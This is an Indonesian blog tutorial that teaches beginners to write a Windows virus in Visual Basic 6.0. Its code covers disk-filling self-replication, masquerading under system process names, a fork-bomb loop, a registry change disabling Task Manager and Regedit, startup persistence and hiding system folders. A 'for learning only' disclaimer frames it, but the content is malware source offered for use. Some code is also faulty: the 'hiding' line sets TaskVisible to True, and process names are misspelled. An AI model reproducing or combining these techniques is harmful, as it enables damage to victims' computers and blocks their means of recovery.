decast corleon

Sedikit pengetahuan aja buat temen-temen pemula yang lagi belajar Visual Basic 6.0 mengetahui tentang seni Virologi. Sebenarnya dengan sedikit Trik yang cukup handal itu akan dapat membuat para pengguna computer menjadi kualahan bukan kepalang. Karena ulah si virus itu, lewat penggandaan, bisa menjalankan dirinya lebih dari 1, memiliki kemampuan anti-task, menyembunyikan file dan cara-cara yang lain. Penulis akan menyampaikan cara membuatnya, tapi ingat ini hanya untuk pengetahuan saja dan jangan disalah gunakan.

Yang pertama, virus itu berjalan dengan cara bersembunyi dari task manager. Sebelumnya anda tahu kan task manager. Fungsi utamanya untuk memonitor jalannya aktivitas computer, caranya dengan tekan Ctrl+Alt+Del. Nah logikanya adalah ketika program dijalankan maka virus bersembunyi dari task manager. Kode programnya seperti ini :


Private Sub Form_Load ( )

App.TaskVisible = True

End Sub


Simple bukan kodenya?nah kalo cara ini boleh dicoba dengan program yang anda buat sendiri yang tentunya bukan program yang merusak computer anda. Yang kedua adalah seperti virus brontok, virus ini dapat menggandakan dirinya menjadi sangat banyak sekali. Mau tahu contoh programnya?perhatikan kode di bawah ini :



FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\WINDOWS\FONTS\joss"_

& m & ".exe"



Pengertian diatas adalah secara otomatis virus anda akan menggankan diri satu kali pada C:\Windows\Fonts\joss yang berekstensikan *.exe. Simple bukan kodenya, tapi itu belum seberapa. Buat apa klo program perusak cuma menggandakan diri satu kali saja. Virus yang sebenarnya adalah virus yang bisa memenuhi isi hardisk targetnya. Nah berikut tips dari saya untuk menggandakan bahkan sampai beribu-ribu kali banyaknya.



For m = i To 100000000

    FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\WINDOWS\FONTS\joss"_ & m & ".exe"

Next m



Pengertiannya masih sama, yaitu menggandakan diri ke drive C:\Windows\Fonts\Joss.exe. akan tetapi dengan perulangan For – Next virus akan menjadi ganda sampai jutaan file. Mungkin file virus memang kecil, tapi coba anda hitung sekarang, jika file virus anda sebesar 300kb dan anda gandakan menjadi 10.000 file. Maka file virus itu akan memenuhi hardisk orang yang terkena virus tersebut.



Yang ketiga sekarang, virus berjalan tanpa takut di End-Proccess. Kok bisa ngga bisa di End-Proccess oleh system Windows?karena windows Task-Manager itu mempunyai kelemahan, yaitu tentang “issas,smss,winlogon,csrss” yang tidak bisa di End-Proccess. Sekarang coba anda tekan Ctrl+Alt+Del, kemudian anda cari file bernama isass.exe pada tab Proccess kemudian tekan End-Proccess. Apa yang terjadi?File tersebut tidak bisa dihentikan bukan?terus apa hubungannya dengan Virus kita?kelihataannya tidak ada hubungannya dech?itu malah sangat penting buat virus kita, mengapa penting?nah ini kelemahan windows Task-Manager, jika virus kita menggunakan nama yang sama dengan issas.exe,smss.exe,winlogon.exe dan csrss.exe maka Task-Managerpun tidak dapat menghentikan virus kita. Hebatkan virus kita, memanfaatkan kelemahan windows. Nah sekarang kita lihat kodenya :



Dim j as String

j = "C:\Windows\"



FileCopy App.Path & "\" & App.EXEName & ".exe", j & "isass.exe"

FileCopy App.Path & "\" & App.EXEName & ".exe", j & "smss.exe"

FileCopy App.Path & "\" & App.EXEName & ".exe", j & "winlogon.exe"

FileCopy App.Path & "\" & App.EXEName & ".exe", j & "csrss.exe"



Shell j & "issas.exe"

Shell j & "smss.exe"

Shell j & "winlogon.exe"

Shell j & "csrss.exe"



Yang pertama itu adalah variabelnya yang bernama J dan bertype String. Terus bagian kedua adalah menggandakan diri ke j (yang adalah c:\Windows\) dan kemudian menjalankannya dengan perintah Shell (perhatikan dan hafalkan fungsi ini). Mudah bukan cara membuatnya. Sekarang yang ketiga, virus itu dapat menjalankan dirinya lebih dari satu. Kok bisa jalan lebih dari satu?coba aj kode yang satu ini:



Shell App.EXEName & ".exe"



Gimana, kodenya tidak rumit kan sebenarnya? Nah ini bisa dicoba, jika anda jalankan maka pada tampilan form anda pasti akan muncul dua. Terus apa fungsinya? Nah tips yang satu ini jangan di coba, karena program bisa menjalankan sampai 1000 kali bahkan lebih. Kalau anda mencoba menggunakannya, computer anda di jamin hank dan super lemot. Nech contoh kodenya :



For d = 1 To 10000

    Shell App.EXEName & ".exe"

Next



Sama sebenarnya kode diatas, cuman ditambah kode perulangan For-Next. Dengan menggandakan 10.000 kali. Jika program itu dijalankan sekaligus, maka computer anda jelas akan hank, untuk itu sekali lagi berhati-hati. Teknik berikutnya yaitu pemblokiran terhadap Task-Manager dan Regedit. Mengapa perlu ada pemblokiran terhadapa Task-Manager dan Regedit? Karma untuk membantu system pertahanan virus kita. Nah bagian ini merupakan bagian yang sangat berbahaya, karena jika program tersebut anda jalankan maka Task-Manager dan Regedit anda jelas tidak akan bisa diakses. Berikut contoh kodenya  :



Open "c:\x.reg" For Output As #1

Print #1, "Windows Registry Editor Version 5.00"

Print #1, ""

Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]"

Print #1, """DisableRegistryTools""" & "=dword:00000001"

Print #1, """DisableTaskMgr""" & "=dword:00000001"

Shell ("regedit /s C:\x.reg")

Kill "c:\x.reg"



Fungsi ini adalah, virus akan membuat file dengan nama x.reg dan akan memanggil Registry editor pada system computer anda. Kemudian dia akan membuat file Dword bernama DisableRegistryTools yang nantinya akan mematikan fungsi regeditnya. Mudah bukan?



Fungsi selanjutnya adalah membuat virus kita berjalan di start up computer kita. Caranya sama dengan cara file copy, cuman tujuan penggandaannya. Tujuan penggandaan anda cari pada documents and settings cari all users kemudian plih start menu – programs, nah ketemu file start upnya, kurang lebih kodenya seperti ini.



FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Documents and Settings\All_ Users\Start Menu\Programs\Startup\its_me.exe"



Nah tips yang terakhir sekarang. Kita dapat membuat file tidak kelihatan alias hidden. Contoh kodenya adalah seperti ini :



SetAttr C:\Windows\FONTS,vbhidden



Coba jalankan program diatas, maka folder FONT pada folder Windows akan hilang, untuk menampilkannya kembali anda masuk ke Control Panel kemudian pilih FolderOption, anda masuk ke tab View dan pilih Show hidden Files and Folders. Maka folder Font akan tampil dengan tambilan agak transparan. Itu masih bisa di deteksi kan lewat folder option. Terus bagaimana biar user tidak bisa untuk menemukannya kembali?apakah file dihapus begitu saja. Sebenarnya tidak, ada tips buat anda untuk mengatur atribut file, bukan hidden tapi superhiden. Caranya perhatikan kode dibawah ini :



SetAttr C:\Windows\Fonts,vbhidden+vbSystem



Bagaimana, mudah bukan? Jadi membuat super hidden sebenarnya mudah, yaitu perpaduan antara vbhidden dan vbsystem.



Selesai sudah tips yang saya berikan kepada anda, ingat ini hanya ilmu untuk di pelajari saja dan jangan disalah gunakan. Dari ini semua setidanya anda semua tahu bagaimana virus itu pada awalnya berjalan, jadi anda bisa menanganinya dengan cara anda sendiri. Selamat belajar….

By : Radit E.P
Baca Selengkapnya...